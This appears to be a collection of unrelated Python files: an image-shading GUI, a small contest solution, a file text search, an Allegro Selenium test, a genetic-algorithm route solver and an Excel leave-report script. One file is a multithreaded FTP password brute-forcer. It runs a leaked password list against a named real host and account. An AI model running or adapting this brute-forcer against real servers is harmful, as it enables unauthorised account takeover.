Vbparam = { 'name':'Vb', 'Pv':(int(self.gImgW/2), self.gImgH) }
Vplist = [ Vtparam, Vbparam ]
for Vp in Vplist:
self._set_QHV_rect(Vp['name'], Po, Vp['Pv'], fraction)
def _update_QHV_rect(self, rect_name, Po, Pv, fraction):
"""
"""
x, y = ROI.interpolateXY(Po, Pv, fraction)
#print(rect_name, ": Po= ", Po, " Pv= ", Pv, " P= ", (x, y))
self.gShadingRECT.set_center(rect_name, x, y)
self.gShadingRECT.set_size(rect_name, self.gERoiW, self.gERoiH)
def _update_all_rectangles(self):
"""To update vertexes of all shading rectangles
"""
rect_name='Co'
#self.gShadingRECT.set_center(rect_name, self.gImgXc, self.gImgYc)
self.gCRoiW = int(self.gImgW * self._property['c_size_ratio'])
self.gCRoiH = int(self.gImgH * self._property['c_size_ratio'])
self.gShadingRECT.set_size(rect_name, self.gCRoiW, self.gCRoiH)
Po = (self.gImgXc, self.gImgYc)
self.gERoiW = int(self.gImgW * self._property['e_size_ratio'])
self.gERoiH = int(self.gImgH * self._property['e_size_ratio'])
#-- Quadrants: Q1, Q2, Q3, Q4
fraction = self._property['d_field']
Q1param = { 'name':'Q1', 'Pv':(self.gImgW, 0) }
Q2param = { 'name':'Q2', 'Pv':(0, 0) }
Q3param = { 'name':'Q3', 'Pv':(0, self.gImgH) }
Q4param = { 'name':'Q4', 'Pv':(self.gImgW, self.gImgH) }
Qplist = [ Q1param, Q2param, Q3param, Q4param ]
for Qp in Qplist:
rect_name = Qp['name']
self._update_QHV_rect(rect_name, Po, Qp['Pv'], fraction)
#-- Latitude (Horizontal): Hr(right), Hl(left)
fraction = self._property['hv_field']
Hrparam = { 'name':'Hr', 'Pv':(self.gImgW, int(self.gImgH/2)) }
Hlparam = { 'name':'Hl', 'Pv':(0, int(self.gImgH/2)) }
Hplist = [ Hrparam, Hlparam ]
for Hp in Hplist:
rect_name = Hp['name']
self._update_QHV_rect(rect_name, Po, Hp['Pv'], fraction)
#-- Longitude (Vertical): Vt(top), Vb(bottom)
Vtparam = { 'name':'Vt', 'Pv':(int(self.gImgW/2), 0) }
Vbparam = { 'name':'Vb', 'Pv':(int(self.gImgW/2), self.gImgH) }
Vplist = [ Vtparam, Vbparam ]
for Vp in Vplist:
rect_name = Vp['name']
self._update_QHV_rect(rect_name, Po, Vp['Pv'], fraction)
def _calculate_all_shadings(self, cvSrcImg):
"""To calculate the luma/chroma shading of each shading rectangles.
The calculated result is saved in self.gShadingINFO which is a dictionary of the following format:
e.g., { 'Co':shadingDict, 'Q1':shadingDict, ... }
where shadingDict specifies the Luma/Chroma and Vertexes of the named shading rectangle
Arguments
--------------
cvSrcImg: cv Mat
the source image to get sub-image of each shading rectangle
"""
#-- clear the shading info list
self.gShadingINFO.clear()
#-- get vertexes of all shading rectangles
allRect = self.gShadingRECT.get_vertex_all()
#print(allRect)
#-- calculate Y, R/G/B of each sub-image
for rect in allRect:
nameID = rect[0]
VPt = rect[1]
VPb = rect[2]
subimg = cvSrcImg[VPt[1]:VPb[1], VPt[0]:VPb[0]]
subGray = cv2.cvtColor(subimg, cv2.COLOR_BGR2GRAY)
Bmean = int(np.mean(subimg[:,:,0]))
Gmean = int(np.mean(subimg[:,:,1]))
Rmean = int(np.mean(subimg[:,:,2]))
Ymean = int(np.mean(subGray))
Rratio = Rmean/Gmean
Bratio = Bmean/Gmean
if False:
#print(nameID, ": shape= ", subGray.shape, shading rect 的 an= ", Ymean, " Gmean= ", Gmean)
Ytext = "Y= "+str(Ymean)
RGtext = "R/G= "+ "{:.2f}%".format(Rratio)
BGtext = "B/G= "+ "{:.2f}%".format(Bratio)
print(Ytext, ' ', RGtext, ' ', BGtext)
text = Ytext
fface = cv2.FONT_HERSHEY_SIMPLEX
fscale=1
fthick=2
((tw, th),tpad) = cv2.getTextSize(text=Ytext, fontFace=fface, fontScale=fscale, thickness=fthick)
cv2.putText(cv_img, text, (VPt[0], VPb[1]+(th+tpad*2)), fface, fscale, (0, 0, 200), fthick, 255)
#text = nameID + ": Y= " + str(Ymean) + " (R,G,B)= " + str(Rmean) + ", " + str(Gmean) + ", " + str(Bmean)
#print(text, ' @ ', (VPt[0], VPb[1]+10))
#font = cv2.FONT_HERSHEY_SIMPLEX
#fontScale=1
#fontThinckness=1
#cv2.putText(cv_img, text, (VPt[0], VPb[1]+20), font, 1, (0, 0, 200), 2, 255)
#cv2.putText(gImgWC, text, (10, 150), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 200), 2, 255)
shadingDict = { "Y":Ymean, "R":Rmean, "G":Gmean, "B":Bmean, "Vt":VPt, "Vb":VPb }
self.gShadingINFO.setdefault(nameID, shadingDict)
def update(self, cvSrcImg):
"""To update vertexes and Y, R/G/B values of all shading rectangles
Call this method to update vertexes and sub-image values if the properties are changed.
Arguments
--------------
cvSrcImg: cv2 Mat
The source image which is used to get sub-image of each shading rectangle to calculate
the luma/chroma information.
Returns
-------------
gShadingINFO: dict
A dictionary giving information of all shading rectangles of the following format:
* { "Co":{ rectInfo }, "Q1":{rectInfo}, ... }
* rectInfo is a dictionary as well which the format below:
1. { "Y":val, "R":val, "G":val, "B":va, "Vt":(x,y), "Vb":(x,) }
2. Y/R/G/B are average value of all pixels in shading block.
3. Vt and Vb are the top-left and bottom-right point of the shading block.
"""
#-- Update vertexes of each shading rectangles
self._update_all_rectangles()
self.gShadingRECT.update()
#-- Recalculate Y, R/G/B values of each shading rectangles
self._calculate_all_shadings(cvSrcImg)
return self.gShadingINFO
def show(self, cv_win, cv_img):
"""To show all rectangles. (elaborate how to use gShadingINFO)
Arguments
--------------
cv_win: cv2 window name
The window to display the image with shading rectangles
cv_img: cv2 Mat
The image to draw shading rectangles on
"""
color_pass = (0, 255, 0)
color_ng = (0, 0, 255)
Co = self.gShadingINFO['Co']
Co_Y = Co['Y']
Co_R = Co['R']
Co_G = Co['G']
Co_B = Co['B']
lwidth = 2
for k in self.gShadingINFO:
shadingRect = self.gShadingINFO[k]
Vt = shadingRect.get('Vt')
Vb = shadingRect.get('Vb')
_Y = shadingRect['Y']
_R = shadingRect['R']
_G = shadingRect['G']
_B = shadingRect['B']
#-- check Luma shading
Y_ratio = _Y/Co_Y
R_ratio = _R/_G
B_ratio = _B/_G
# print(k, ': Y_ratio= ', Y_ratio)
# print(k, ': R_ratio= ', R_ratio)
# print(k, ': B_ratio= ', B_ratio)
is_pass = True
if self._property['luma_enable'] == True:
if Y_ratio < 0.8 or Y_ratio > 1.2:
is_pass = False
if self._property['chroma_enable'] == True:
if R_ratio < 0.9 or R_ratio > 1.1:
is_pass = False
elif B_ratio < 0.9 or B_ratio > 1.1:
is_pass = False
if is_pass or k == 'Co':
color = color_pass
else:
color = color_ng
if self._property['h_enable']==False and (k=='Hr' or k=='Hl'):
pass
elif self._property['v_enable']==False and (k=='Vt' or k=='Vb'):
pass
else:
cv2.rectangle(cv_img, Vt, Vb, color, lwidth)
cv2.imshow(cv_win, cv_img)
###########################################################
# Function : cbfn_Update()
###########################################################
def cbfn_Update():
global scl_windowSize, scl_fieldDiag, scl_fieldHV
global var_chkLuma, var_chkChroma
global var_chkHori, var_chkVert
global gIsImgOpened
if not gIsImgOpened:
print('Error: image not opened yet!!')
return
gImageShading.set_property(h_enable=False)
gImageShading.set_property(v_enable=False)
if 1==var_chkHori.get() or 1==var_chkVert.get():
scl_fieldHV.config(state= NORMAL)
if 1==var_chkHori.get():
gImageShading.set_property(h_enable=True)
if 1==var_chkVert.get():
gImageShading.set_property(v_enable=True)
else:
scl_fieldHV.config(state= DISABLED)
if 1==var_chkLuma.get():
gImageShading.set_property(luma_enable=True)
else:
gImageShading.set_property(luma_enable=False)
if 1==var_chkChroma.get():
gImageShading.set_property(chroma_enable=True)
else:
gImageShading.set_property(chroma_enable=False)
#-- Update center rectangle size
gImageShading.set_property(c_size_ratio=scl_windowSize.get())
gImageShading.set_property(e_size_ratio=scl_windowSize.get())
gImageShading.set_property(d_field=scl_fieldDiag.get())
gImageShading.set_property(hv_field=scl_fieldHV.get())
gImgWC = gImgSrc.copy()
gImageShading.update(gImgWC)
gImageShading.show(gSrcImgName, gImgWC)
return
###########################################################
# Message Box with OK button
###########################################################
def messageBoxOK(title, msg):
box = Toplevel()
box.title(title)
Label(box, text=msg).pack()
Button(box, text='OK', command=box.destroy).pack()
###########################################################
# Function: Parse file's path/basename/extname
###########################################################
def parse_file_path(fpath):
print('Input filename: ', fpath)
# Create root repository folder for output images
fdir = os.path.dirname(fpath)
ffile = os.path.basename(fpath)
fbase, fext = os.path.splitext(ffile)
# try:
# fdir = os.path.dirname(fpath)
# ffile = os.path.basename(fpath)
# fbase, fext = os.path.splitext(ffile)
# except:
# print("Error: failed to parse file path, name.")
# return '', '', ''
print('Directory: ', fdir)
print("fbase= ", fbase, 'fext= ', fext)
return fdir, fbase, fext
###########################################################
# Function : Callback of Button RESET
###########################################################
def cbfnButtonReset():
cv2.destroyAllWindows()
btnSelectIMG.config(text='Select Image', command=cbfnButton_SelectIMG, bg='LightGreen')
###########################################################
# Button Function : SelectIMG
###########################################################
def cbfnButton_SelectIMG():
global gOpenFileName, gSrcImgName, gSrcImgDir, gSrcImgBase, gSrcImgExt
global gImgH, gImgW, gImgXc, gImgYc
global gRoiW, gRoiH
global gShadingRECT
global gImgWC, gImgSrc
gOpenFileName = filedialog.askopenfilename()
#gSrcImgDir, gSrcImgBase, gSrcImgExt = parse_file_path(gOpenFileName)
try:
# f = open(gOpenFileName, 'rb')
# rawdata = f.read()
# f.close()
# rawdata = np.fromfile(gOpenFileName, dtype=np.uint16)
gSrcImgDir, gSrcImgBase, gSrcImgExt = parse_file_path(gOpenFileName)
except:
messageBoxOK('FileIO', 'Failed to open file :\n' + gOpenFileName)
cbfnButtonReset()
return
# -- modify title of main window, change button to RESET
gSrcImgName = gSrcImgBase + gSrcImgExt
winRoot.title(winTitle+ ' -- ' + gSrcImgName)
btnSelectIMG.config(text='RESET', command=cbfnButtonReset, bg='Yellow')
# -- Open and show image with CV2
os.chdir(gSrcImgDir)
# matImg = cv2.imread(gSrcImgName)
# print(matImg.shape)
try:
gImgSrc = cv2.imread(gOpenFileName)
print('Image Size: ', gImgSrc.shape[1], '*', gImgSrc.shape[0])
cv2.namedWindow(gSrcImgName, cv2.WINDOW_NORMAL)
except:
messageBoxOK('FileIO', 'CV2 failed to load image file :\n' + gOpenFileName)
cbfnButtonReset()
return
#-- resize window to 720p in image height
resizeH = 480
if gImgSrc.shape[1] > resizeH:
w = int(resizeH*gImgSrc.shape[1]/gImgSrc.shape[0])
h = resizeH
cv2.resizeWindow(gSrcImgName, w, h)
print('Output window resized to: ', w, '*', h)
# cv2.imshow(gSrcImgName, gImgSrc)
# -- Now, create a thread to watch the status of the window
def PROC_check_window_status(namedWin, slp_time):
while True:
if cv2.getWindowProperty(namedWin, 1) < 0:
cbfnButtonReset()
break
time.sleep(slp_time)
try:
_thread.start_new_thread(PROC_check_window_status, (gSrcImgName, 0.2))
except:
print("Error, failed to create new thread to watch named window: ", gSrcImgName)
return
#-------------------------------------------
# Create shading Rectangles
#-------------------------------------------
#gImgWC = gImgSrc.copy()
#cv2.imshow(gSrcImgName, gImgWC)
global gIsImgOpened
gIsImgOpened = True
global gImageShading
gImageShading = ImageShading(gImgSrc.shape[1], gImgSrc.shape[0])
cbfn_Update()
return
###########################################################
# Button Function : Exit Main Window
###########################################################
def cbfnButtonMainExit():
global winRoot
cv2.destroyAllWindows()
winRoot.destroy()
###########################################################
# MainEntry
###########################################################
from tkinter import * # Tk, Label, Entry, Radiobutton, IntVar, Button
from tkinter import filedialog
def main():
global winTitle, winRoot
global scl_windowSize, scl_fieldDiag, scl_fieldHV
global var_chkLuma, var_chkChroma
global var_chkHori, var_chkVert
global gOpenFileName, gSrcImgName, gSrcImgDir, gSrcImgBase, gSrcImgExt
global btnSelectIMG
winTitle = 'Shading Test'
winRoot = Tk()
winRoot.title(winTitle)
winRoot.geometry('400x300+150+100')
# -- Create Top/Mid/Buttom frames
frame_padx = 2
frame_pady = 2
frmTop = Frame(winRoot)
frmTop.pack(fill=X, padx=frame_padx, pady=frame_pady)
frmMid1 = Frame(winRoot)
frmMid1.pack(fill=X, padx=frame_padx, pady=frame_pady)
frmMid2 = Frame(winRoot)
frmMid2.pack(fill=X, padx=frame_padx, pady=frame_pady)
# frmButtom = Frame(winRoot)
# frmButtom.pack(fill=X, padx=frame_padx, pady=frame_pady)
#------------------------------------
# Frame Top
#------------------------------------
# -- Button : SelectIMG
btnSelectIMG = Button(frmTop, text='Select Image', command=cbfnButton_SelectIMG, bg='LightGreen')
btnSelectIMG.pack(fill=X)
#------------------------------------
# Frame Mid1
#------------------------------------
var_chkLuma = IntVar(value=1)
chkbtn_Luma = Checkbutton(frmMid1, variable=var_chkLuma, text='Luma', command=cbfn_Update)
chkbtn_Luma.pack(side=LEFT)
var_chkChroma = IntVar(value=1)
chkbtn_Chroma = Checkbutton(frmMid1, variable=var_chkChroma, text='Chroma', command=cbfn_Update)
chkbtn_Chroma.pack(side=LEFT)
def cbfnScale_WinSize(val):
cbfn_Update()
return
scl_windowSize = Scale(frmMid1, label="Window Size (ratio): ", orient=HORIZONTAL, from_=0.02, to=0.2, resolution=0.01, command=cbfnScale_WinSize)
scl_windowSize.pack(expand=True, side=RIGHT, fill=X, padx=16)
scl_windowSize.set(0.1)
#------------------------------------
# Frame Mid2
#------------------------------------
frmMidLeft = Frame(frmMid2, bg='Red')
frmMidLeft.pack(expand=True, fill=X, side=LEFT)
frmMidRight = Frame(frmMid2, bg='Yellow')
frmMidRight.pack(side=LEFT, padx=24)
# -- Frame: MidLeft
lbl_t = Label(frmMidLeft, anchor=W, text="Image Field:").pack(expand=True, fill=X)
def cbfnScale_DiagImgField(val):
cbfn_Update()
return
scl_fieldDiag = Scale(frmMidLeft, label='Diagnal: ', orient=HORIZONTAL, from_=0.1, to=1.0, resolution=0.05, command=cbfnScale_DiagImgField)
scl_fieldDiag.pack(expand=True, fill=X)
scl_fieldDiag.set(1.0)
def cbfnScale_HvImgField(val):
cbfn_Update()
return
scl_fieldHV = Scale(frmMidLeft, label='H/V: ', orient=HORIZONTAL, from_=0.1, to=1.0, resolution=0.05, command=cbfnScale_HvImgField)
scl_fieldHV.pack(expand=True, fill=X)
scl_fieldHV.set(1.0)
# -- Frame: MidRight
var_chkHori = IntVar(value=0)
chkbtn_Hori = Checkbutton(frmMidRight, anchor=W, variable=var_chkHori, text='Horizontal', command=cbfn_Update)
chkbtn_Hori.pack(side=TOP, expand=True, fill=X)
var_chkVert = IntVar(value=0)
chkbtn_Vert = Checkbutton(frmMidRight, anchor=W, variable=var_chkVert, text='Vertical', command=cbfn_Update)
chkbtn_Vert.pack(side=TOP, expand=True, fill=X)
winRoot.mainloop()
if __name__ == "__main__":
main()
| true |
d1200006b8d7a18b11b01eff4fbf38d9dfd8958e | Python | shaswataddas/CodeChef_Contest_Code | /January Lunchtime 2021 Division 3/pair_me.py | UTF-8 | 144 | 3.40625 | 3 | [] | no_license | t = int(input())
while t:
x = list(map(int, input().split()))
x.sort()
if(x[0]+x[1]==x[2]):
print("YES")
else:
print("NO")
t-=1 | true |
3a518159b005be51b7cdc2dd4c15fc8ffb14f08d | Python | Ruth-ikegah/python-mini-projects | /projects/String_search_from_multiple_files/findstring.py | UTF-8 | 701 | 3.34375 | 3 | [
"Python-2.0",
"MIT"
] | permissive | import os
text = input("input text : ")
path = input("path : ")
# os.chdir(path)
def getfiles(path):
f = 0
os.chdir(path)
files = os.listdir()
# print(files)
for file_name in files:
abs_path = os.path.abspath(file_name)
if os.path.isdir(abs_path):
getfiles(abs_path)
if os.path.isfile(abs_path):
f = open(file_name, "r")
if text in f.read():
f = 1
print(text + " found in ")
final_path = os.path.abspath(file_name)
print(final_path)
return True
if f == 1:
print(text + " not found! ")
return False
getfiles(path)
| true |
e116d2a607b98090f23d36542c4aaf01f3bc59e1 | Python | mlxzcax/data-analysis-of-Guangzhou-temperature | /countOfRain.py | UTF-8 | 374 | 3.375 | 3 | [] | no_license | import csv
count=0
i=1
while i<4:
s='%s月天气.csv' % i
with open(s,'r',encoding="utf-8") as csvfile:
reader = csv.DictReader(csvfile)
column1 = [row["天气状况"] for row in reader]
#找到含有雨字的项并计数
for x in column1:
if "雨" in x:
count+=1
i+=1
print("下雨天有%s天" % count)
| true |
7e705318e29d9ce48a5068d3521591bbf78b14c4 | Python | blessyann/MonCo-DataImmersive | /chapter8_8.py | UTF-8 | 838 | 4.6875 | 5 | [] | no_license | # Exercise 8.8 User Albums: Start with your program from Exercise 8.7. Write a "while" loop that allows users to enter an album's artist and title.
# Once you have that information, call "make_album()" with the user's input and print the dictionary that's created.
# Be sure to include a "quit" value in the while loop.
def make_album(artist_name, album_title):
album = {'name': artist_name, 'title': album_title}
return album
while True:
print("please enter 'quit' to stop")
print("\nPlease tell artist name ")
artist_name = input("Artist name: ")
if artist_name == 'quit':
break
print("\n Enter Album title")
album_title = input("Album title: ")
if album_title == 'quit':
break
Album = make_album(artist_name,album_title)
print(Album)
| true |
1b80d65adadcfa57c95c03074eddf185b30dc6c2 | Python | jeffrothkirch/BetterWeather | /controller/weather_service.py | UTF-8 | 2,138 | 2.828125 | 3 | [] | no_license | import datetime
import urllib2
import json
import weather_logic
WeatherServicePort = 8081
def ToString(date):
return date.strftime('%Y-%m-%d')
def fromString(dateString):
return datetime.datetime.strptime(dateString, '%Y-%m-%d')
def GetWeather(location, dateString):
allDates = get_all_dates(location, dateString)
for dateEntry in allDates:
if dateEntry['date'] == dateString:
return dateEntry
return None
def GetSimilarDates(location, numDates, compareDateString):
allDates = get_all_dates(location, compareDateString)
compareDateDetails = GetWeather(location, compareDateString)
rankedDates = weather_logic.RankDates(compareDateDetails, allDates)
return rankedDates[:numDates]
def GetPastForDate(location, desiredDate, desiredDelta):
details = get_all_dates(location, desiredDate)
returnValues = []
desiredDateDate = fromString(desiredDate)
endDateDate = desiredDateDate - desiredDelta
for dateEntry in details:
pastDateString = dateEntry['date']
pastDate = fromString(pastDateString)
if (pastDateString[5:] == desiredDate[5:] and pastDate > endDateDate):
returnValues.append(dateEntry)
return returnValues
def get_all_dates(location, datestring):
url = 'http://localhost:8081/cached/'+location+'/'+datestring+'/'+datestring
r = urllib2.urlopen(url).read()
allDates = convert_to_desired(json.loads(r))
return allDates
def convert_to_desired(response):
convertedEntries = []
oldFormat = response['result']
for date in oldFormat:
converted = {}
converted['date'] = date['date']
converted['descriptor'] = date['events']
converted['low'] = tryfloat(date['min_temperaturef'])
converted['high'] = tryfloat(date['max_temperaturef'])
converted['precipitation'] = tryfloat(date['precipitationin'])
converted['cloudcover'] = tryfloat(date['cloudcover'])
convertedEntries.append(converted)
return convertedEntries
def tryfloat(value):
try:
return float(value)
except ValueError:
return 0
| true |
c8dca3eb1296ed0f44657be23498bd8e178024ae | Python | taoranzhishang/Python_codes_for_learning | /study_code/Day_24/多进程密码破解/01多线程密码破解.py | UTF-8 | 1,461 | 2.78125 | 3 | [] | no_license | # http://hk801.pc51.com/ 破解FTP密码
'''
"user"
csdn user用户名
密码字典 password
'''
import ftplib
import threading
def TestFTP(addr, user, password):
with sem: # 锁定数量
try:
global isfind
myftp = ftplib.FTP(addr) # 登陆服务器
if isfind: # 找到退出循环
return
myftp.login(user, password)
print(user, password, "------------------------------------密码正确")
isfind = True
return user + "#" + password
except:
print(user, password, "密码不正确")
return ""
# 读取文件
sem = threading.Semaphore(20) # 限制线程的最大数量为2个
isfind = False
file = open("Z:\\F\\第一阶段视频\\20170531\\NBdata\\qqAnd163Password.txt", "rb")
while True:
if isfind: # 找到退出循环
break
line = file.readline() # 读取一行
line = line.decode("gbk", "ignore") # 转码
linelist = line.split(" # ")
if linelist[0] == "qq123456789":
print("---------------------------------------------")
# linelist[0] 密码
# TestFTP("hk801.pc51.com", "qinghuabeidacn517", linelist[0])
# list,批量管理
threading.Thread(target=TestFTP, args=("hk801.pc51.com", "qinghuabeidacn517", linelist[0])).start()
# print(line)
if not line:
break
# TestFTP("hk801.pc51.com","qinghuabeidacn517","qq123456789")
| true |
918764201b58d846081388453aa8287af933b59c | Python | s19497/TAU | /lab_8/test_classes.py | UTF-8 | 1,977 | 2.53125 | 3 | [] | no_license | from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import NoSuchElementException
class TestWebsite:
def __init__(self, driver: WebDriver):
self.driver = driver
class Allegro(TestWebsite):
URL = 'https://allegro.pl'
def print_button(self):
self.driver.get(self.URL)
user_button_xpath = '/html/body/div[3]/div[5]/header/div/nav/div[5]/button'
login_page_button_xpath = '/html/body/div[3]/div[5]/header/div/nav/div[5]/div/div/div/div/div/a'
login_input_xpath = '//*[@id="login"]'
password_input_xpath = '//*[@id="password"]'
login_button_xpath = '//*[@id="authForm"]/div/div/div[2]/button'
login_error_msg_xpath = '//*[@id="login-form-submit-error"]'
self._wait_for_privacy_button(20)
self._click_xpath(user_button_xpath)
self._click_xpath(login_page_button_xpath)
self._wait_for_privacy_button(2)
self._input_xpath(login_input_xpath, 'test@test.test')
self._input_xpath(password_input_xpath, 'haslo')
self._click_xpath(login_button_xpath)
WebDriverWait(self.driver, 2).until(
EC.presence_of_element_located((By.XPATH, login_error_msg_xpath))
)
print('DONE')
def _click_xpath(self, xpath):
self.driver.find_element(By.XPATH, xpath).click()
def _input_xpath(self, xpath, value):
self.driver.find_element(By.XPATH, xpath).send_keys(value)
def _wait_for_privacy_button(self, seconds=2):
privacy_button_xpath = '/html/body/div[3]/div[9]/div/div/div/div/div[2]/div[2]/button[1]'
privacy_button = WebDriverWait(self.driver, seconds).until(
EC.element_to_be_clickable((By.XPATH, privacy_button_xpath))
)
privacy_button.click()
| true |
191673548c9145be7cdb0f59715a306f851e480b | Python | The-Victoria-Initiative/copernicium | /code/03/solveTSProblem.py | UTF-8 | 5,833 | 3 | 3 | [] | no_license | ###################
print "run : --- Solving a travelling salesman problem with a genetic algorithm"
###################
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-W", "--width", help="width", action="store", type=int, dest="width", default=400)
parser.add_option("-H", "--height", help="height", action="store", type=int, dest="height", default=400)
parser.add_option("-p", "--points", help="points", action="store", type=int, dest="points", default=20)
parser.add_option("-g", "--genotypes", help="the number of genotypes", action="store", type=int, dest="genotypes", default=10)
parser.add_option("-i", "--iteration_limit", help="limit the number of generations", action="store", type=int, dest="max_generations", default=1000)
parser.add_option("-m", "--mutation_chance", help="the mutation probability", action="store", type=float, dest="mutation_chance", default=0.1)
parser.add_option("-a", "--always_best", help="the fittest always survive", action="store_true", dest="always_best", default=False)
parser.add_option("-v", "--verbose", help="turn on verbose mode", action="store_true", dest="verbose", default=False)
(options, args) = parser.parse_args()
if options.verbose:
print "run : --- Options"
print "run : width: ",options.width
print "run : height: ",options.height
print "run : points: ",options.points
print "run : n genotypes: ",options.genotypes
print "run : maximum generations: ",options.max_generations
print "run : mutation probability: ",options.mutation_chance
print "run : fittest always survives: ",options.always_best
print "run : verbose: ",options.verbose
###################
import Population
import FitnessMeasures
import Tools
import Point
# from math import sqrt
import time
###################
print "run : --- Make points"
points = Tools.FillBoard(options.width,options.height,options.points)
print "run : ",points
fitness = FitnessMeasures.TSFitnessMeasure(points)
bases = Tools.MinBases(options.points)
print "run : points: %i, bases: %i (2^%i = %i)"%(options.points,bases,bases,2**bases)
population = \
Population.Population(fitness,
n_genotypes=options.genotypes,
n_genes=options.points*2,
n_bases=bases,
mutation_chance=options.mutation_chance,
always_best=options.always_best,
verbose=options.verbose)
generation = 0
evolution = []
###################
print "run : --- Running"
ga_start = time.time()
while(True):
generation +=1
if (options.max_generations != -1) and (generation > options.max_generations): break
if options.verbose or (generation%100 == 0):
print "run : generation[%i]"%generation
best_result = max(population.fitness)
print "run : best result: %f"%best_result
print population
if options.verbose: print "run : selecting fittest"
fittest = population.select_fittest()
evolution.append((fittest[0],
(1. / (max(population.fitness))),
fitness.eval((fittest[0].eval()),return_coding=True)))
# if (best_result > threshold): break
if options.verbose: print "run : breeding: %s and %s"%(fittest[0].name,fittest[1].name)
population.breed_next_generation(fittest)
population.eval()
ga_end = time.time()
print population
best_result = max(population.fitness)
fittest = population.select_fittest()
best_path = fitness.eval((fittest[0].eval()))[1]
coding_used = fitness.eval((fittest[0].eval()),return_coding=True)
print "run : final generation[%i], best result: %f"%(generation, 1. / best_result)
print "run : solution: %s"%repr(fittest[0])
print "run : ",coding_used
print "run : ",best_path
print "run : time taken: %.2f s"%(ga_end-ga_start)
# ###################
# print "run : --- Brute force problem solving"
# brute_start = time.time()
# best_circle = Tools.SolveBoard(board,path,verbose=False)
# brute_end = time.time()
# print "run : solution: %s"%repr(best_circle)
# print "run : time taken: %.2f s"%(brute_end-brute_start)
###################
print "test : --- Write points to file"
file_name = "board_setup.csv"
Tools.WritePointsToCSV(points,file_name)
print "run : --- Write path to file"
file_name = "path.csv"
Tools.WritePathToFile(best_path,points,file_name)
print "run : --- Write scores to file"
file_name = "evolution.json"
Tools.WriteEvolutionToJSON(evolution,points,fitness,file_name)
print "run : --- Write genotype to file"
file_name = "genotype.json"
Tools.WriteGenotypeToJSON(fittest[0],file_name,coding=coding_used)
# print "run : --- Write evolution of path to file"
# file_name = "evolution.csv"
# Tools.WriteCirclesToCSV(best_path,file_name,scores=scores)
# print "run : --- Write parameters to file"
# file_name = "parameters.csv"
# Tools.WriteParametersToFile(options,file_name)
# print "run : --- Write results to files"
# results = {
# "GA result":repr(fittest[0].eval())[:-4],
# "GA time" :"%.2f s"%(ga_end-ga_start),
# "GA score" :"%.2f"%sqrt(best_result),
# "Brute force circle":repr(best_circle)[:-4],
# "Brute force Time" :"%.2f s"%(brute_end-brute_start),
# "Brute force score" :"%.2f"%best_circle.r
# }
# file_name = "results.json"
# import json
# with open(file_name, 'wb') as fp: json.dump(results, fp)
###################
print "run : --- done\n" | true |
80bb9638dc982e25fe757c1359487a3161eee9ce | Python | jaytparekh7121994/PythonProjects | /FinalApplicationwithGui.py | UTF-8 | 12,309 | 3.1875 | 3 | [] | no_license | """ This is the final version of Excel Task allocated.
This is python program is GUI based which takes CSV and 2 Xls files
Instructions:
1) The data.csv file has to be renamed in mmyyyy.csv format
Eg; data.csv file for Month of November would be 112019.csv it will create an output112019.csv for reference
2) Name and Employee ID in .csv must match in Team Details sheet of Utilization_file.xlsx must be updated
Do not press "start" untill you have not given the input to all the 3 files alongwith the sheetname of 3rd file
"""
# Adding all the modules that are necessary for this program
import csv
import datetime
import calendar
from tkinter import filedialog
from tkinter import *
import ntpath
import openpyxl
import sys
import os
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
def automation_logic():
basename=ntpath.basename(input_data)
#print (filePath)
splitName=basename.split(".")
filename=splitName[0]
month=int(filename[0:2])
#print(month)
year=int(filename[2:])
#print(year)
##From here the Data.csv file is read and leave of each employee is been calculated
# csv file name
# initializing the titles and rows list
fields = []
rows = []
List1=[]
tempList=[]
titles=['Emp Id','Name']
offdayList=['WO','HL']
leaveList=['LW','LV','AL','A','AB','CO']
##CompOff and TRavelling are not been considered here
day=1
m_range=calendar.monthrange(year,month)
date=datetime.date(year,month,day)
#dayNumber of 1st day of month
firstDay=m_range[0]+1#1 ->Monday
if firstDay == 7:
firstDay=0
print(firstDay)
startWeek=date.isocalendar()[1]
day=m_range[1]
date=datetime.date(year,month,day)
endWeek=date.isocalendar()[1]
for i in range(startWeek,endWeek+1):
temp='Week '+str(i)
titles.append(temp)
#print(titles)
List1.append(titles)
# reading csv file
with open(input_data, 'r') as csvfile:
# creating a csv reader object
csvreader = csv.reader(csvfile)
# extracting field names through first row
fields = next(csvreader)
# extracting each data row one by one
for row in csvreader:
rows.append(row)
###### Creating outputmmyyyy.csv reference File
dayCounter=firstDay
leave=0
endday=0
for row in rows:
# parsing each column of a row
for col in row[:2]:
tempList.append(col)
#print("%10s"%col ,end='')
#Leave Comparison Logic
for col in row[4:]:
endday+=1
if(dayCounter<7):
if col in leaveList:
leave+=1.0
elif col == 'L/2':
leave+=0.5
dayCounter+=1
if(dayCounter==7):
dayCounter=0
tempList.append(int(leave))
leave=0
if(endday==day):
tempList.append(int(leave))
endday=0
dayCounter=firstDay
leave=0
#print(dayCounter)
#print(leave)
#print(tempList)
List1.append(tempList)
tempList=[]
#print('\n')
##Printing the List1 having Empid,Name and Leave details
print(List1)
##This outfile is having the weekwise leave plan data
outputfile='output'+str(month)+str(year)+'.csv'
with open(outputfile,'w',newline='') as writeFile:
writer=csv.writer(writeFile)
writer.writerows(List1)
csvfile.close()
writeFile.close()
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
#Writing to Team Utilization
wb=openpyxl.load_workbook(team_utilization)
sheet=wb["Team Details"]
emp_id=[]
m_row=sheet.max_row
for i in range(4,m_row+1):
cell_obj=sheet.cell(row=i,column=4)
emp_id.append(cell_obj.value)
print(emp_id)
f=open(outputfile,"r")
csv_file=csv.reader(f,delimiter=",")
personData=[]
sheet1=wb["Utilization"]
startNum=17 #Q7 ..Week 1 of month
for row in csv_file:
for i in range(0,len(emp_id)):
if str(emp_id[i]) in row[0]:
personData=row
for j in range(2,len(personData)):
cell=sheet1.cell(row=i+7,column=startNum)
cell.value=personData[j]
startNum+=8
startNum=17
wb.save(team_utilization)
f.close()
#os.remove('output.csv')
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Leave_projection
sheet=wb["Team Details"]
emp_id=[]
